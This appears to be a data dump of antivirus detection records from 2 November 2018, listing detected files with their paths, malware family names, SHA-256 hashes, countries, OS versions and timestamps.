  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9958289\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105256-3592c383', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105256-3592C383', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123806-f40fc7f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d6a48a85\\AVSCAN-20181102-123755-F29D0E12\\AVSCAN-20181102-123806-F40FC7F0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0016769.exe', filepath='\\\\?\\L:\\System Volume Information\\_restore{AE0778D3-AEE6-4B14-9393-AA69173A7867}\\RP27\\A0016769.exe', filesize=9216000, name='TR/Crypt.XPACK.Gen3.#M300.#R200067'), hash='32c47dda5925bf1b8f2c81d7af177e17d2bf489883d47d7731e0a66aea5d7ce5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ie4uinit.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\ie4uinit.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='2c0860deb5bc0f6becc1a34e16de9b28724f77acaba2184b8f1d6f97d7c6f903', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='washintn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\WASHINTN\\WASHINTN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc3d9de330-bd42-4044-bab5-070c5d18d955.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc3D9DE330-BD42-4044-BAB5-070C5D18D955.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T19:00:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194025-417e9849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194025-417E9849', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151722-b1f5af7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_030bbd7c\\AVSCAN-20181102-151216-974A845E\\AVSCAN-20181102-151722-B1F5AF7D', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa15996.38300\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa15996.38300\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bcastdvr.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\bcastdvr.exe', filesize=384000, name='W32/Neshta.A.#M1.#R1'), hash='099c4543397b9997b0b96d4bbb45f187285912efa6c4698a6511b7c77e67b0b8', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:55:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devicedisplayobjectprovider.exe', filepath='d:\\windows\\system32\\DeviceDisplayObjectProvider.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='0bbcc05ca445389c2f2b949db94161999b78ccb4e65e874ba11c9f4f5a2c5240', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:29:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='t0.ax', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\FileZilla Server\\07 948\\t0.ax', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:12:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sdpefilter.exe', filepath='C:\\Program Files\\Hewlett-Packard\\Drive Encryption\\SDPEFilter.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='3196de18e53fc7c8061f5d669d5ec9315697ebdd4811588c3a140360756c11a3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:JdLxRGqxc0uHZfaY.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T00:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124227-51c77d7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-124227-51C77D7B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102020-378a8fa5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e2ddb0b\\AVSCAN-20181102-101834-2A32AFA7\\AVSCAN-20181102-102020-378A8FA5', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051527-480b5c17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051527-480B5C17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060144-bf4a832e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060144-BF4A832E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055819-44c75930', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055819-44C75930', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144200-86a5925e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144200-86A5925E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='80007bd6', filepath='C:\\WINDOWS\\CSC\\d7\\80007BD6', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061345-6cf2face', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061345-6CF2FACE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181102T083005-00020/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mitmdump.exe', filepath='C:\\Program Files (x86)\\mitmproxy\\bin\\mitmdump.exe', filesize=5000000, name='HEUR/AGEN.1031272.#M1.#R1'), hash='491d9362db041c189aaf974ea3e1f21b824f12538f90fa6cf927bf0edc26c9af', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\mitmproxy-4.0.4-windows-installer.exe', parentsize=40538732, timestamp='2018-11-02T16:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='agendador-backup-2017_06_07_16_43_42.exe', filepath='C:\\Users\\X\\Desktop\\NextAgeERP\\Agendador-Backup-2017_06_07_16_43_42.exe', filesize=1984000, name='TR/Dropper.Gen.#M300.#R3643'), hash='646b0305401ede0041df46b4e7fad7ea07bc0aeec024364a7317332214a02e75', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T01:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='52ddc21dd94dffdfaf2cff0bef8e20129f46d2a0594af38c71b68ad3da57153e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T22:08:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113448-1fed17ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91bd8850\\AVSCAN-20181102-113236-0BCE7E9D\\AVSCAN-20181102-113448-1FED17EA', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:38:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054245-1808816e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054245-1808816E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iumx3ydvgzxx4m.x64.dll#1aa24cb3e5568a2e', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\v1\\20181101.172246\\236\\UNIDEALS\\IUMx3YdvGZxx4m.x64.dll#1AA24CB3E5568A2E', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='6075644c35f42ca5f57d6c108ab9c5a1089a1bc18faf1b0d0281ad98afd05667', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050702-1b0cb1f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050702-1B0CB1F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061933-3beee08c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061933-3BEEE08C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055247-7ed599b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055247-7ED599B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162138-085123e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_659e75da\\AVSCAN-20181102-162123-06157291\\AVSCAN-20181102-162138-085123E6', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:21:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061204-3061a64c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061204-3061A64C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061041-39442a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-061022-36B694EC\\AVSCAN-20181102-061041-39442A62', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052101-0ebc11ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052101-0EBC11ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054620-986a29e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054620-986A29E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052946-4780a4ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052946-4780A4EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054714-b8b64391', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054714-B8B64391', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061042-ff7bd602', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061042-FF7BD602', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055115-481c3397', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055115-481C3397', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e42204c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E42204C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
